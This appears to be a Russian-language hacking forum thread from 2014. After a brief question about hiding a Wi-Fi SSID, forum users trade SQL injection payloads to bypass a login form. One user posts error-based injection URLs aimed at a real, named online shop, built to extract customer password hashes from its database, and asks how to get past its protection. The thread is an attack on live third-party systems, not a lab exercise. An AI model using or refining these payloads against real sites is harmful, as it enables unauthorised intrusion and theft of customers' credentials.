01.11.2014, 23:01
|
|
Флудер
Регистрация: 02.04.2011
Сообщений: 2,531
Провел на форуме:
755326
Репутация:
99
|
|
возможно ли зашифровать передачу скрытого ssid для wifi точки, что бы его нельзя было перехватить ? шифрование точки: WPA-PSK/WPA2-PSK
зашифровать так же как и пароль wifi точки !
|
|
|
04.11.2014, 19:28
|
|
Новичок
Регистрация: 02.03.2011
Сообщений: 15
Провел на форуме:
5507
Репутация:
0
|
|
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?
P.S.
Сообщение от Br@!ns
# например еще
Пробовал.( |
|
|
|
04.11.2014, 20:50
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от Han
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?
# например еще
|
|
|
|
04.11.2014, 23:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Han
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?
P.S. Пробовал.(
пробовали с комбинацией OR? http://www.securityidiots.com/Web-Pe...injection.html
|
|
|
|
05.11.2014, 00:22
|
|
Новичок
Регистрация: 02.03.2011
Сообщений: 15
Провел на форуме:
5507
Репутация:
0
|
|
Пробовал. Запрос выполняется, но вход не происходит.
|
|
|
|
05.11.2014, 10:36
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389
Репутация:
332
|
|
Сообщение от Han
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?
P.S. Пробовал.(
Код:
login=Admin'+or+login+='bad_login_name&pass=any
bad_login_name - любой логин кроме необходимого, к которому не подходит пасс any
|
|
|
|
05.11.2014, 19:17
|
|
Новичок
Регистрация: 02.03.2011
Сообщений: 15
Провел на форуме:
5507
Репутация:
0
|
|
Сообщение от KIR@PRO
Код:
login=Admin'+or+login+='bad_login_name&pass=any
bad_login_name
- любой логин кроме необходимого, к которому не подходит пасс
anyНе помогло.
В исходном коде введенные мною кавычки выглядят как & # 039; только без пробела. Это играет роль?
|
|
|
|
05.11.2014, 19:37
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Han
Не помогло.
В исходном коде введенные мною кавычки выглядят как '. Это играет роль?
кавычки не экранируются и не фильтруются. попробуйте
Код:
SELECT * FROM users WHERE `login` = 'Admin' AND `password` = '1' OR '1'='1' --
это равносильно запросу
Код:
SELECT * FROM users WHERE login='Admin' AND TRUE
поэтому будет выборка из таблицы, где значение колонки login == Admin.
|
|
|
|
05.11.2014, 20:00
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389
Репутация:
332
|
|
Сообщение от Han
Не помогло.
В исходном коде введенные мною кавычки выглядят как & # 039; . Это играет роль?
да, это фильтрация.... там походу только слеш не фильтруется
|
|
|
|
06.11.2014, 15:55
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Есть Error based Injection.
Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм
Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать?
норм
Код HTML:
_http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+customers+limit+0,1))))=1
ошибка
Код HTML:
http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+formaggiodb_osc.customers+limit+0,1))))=1
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
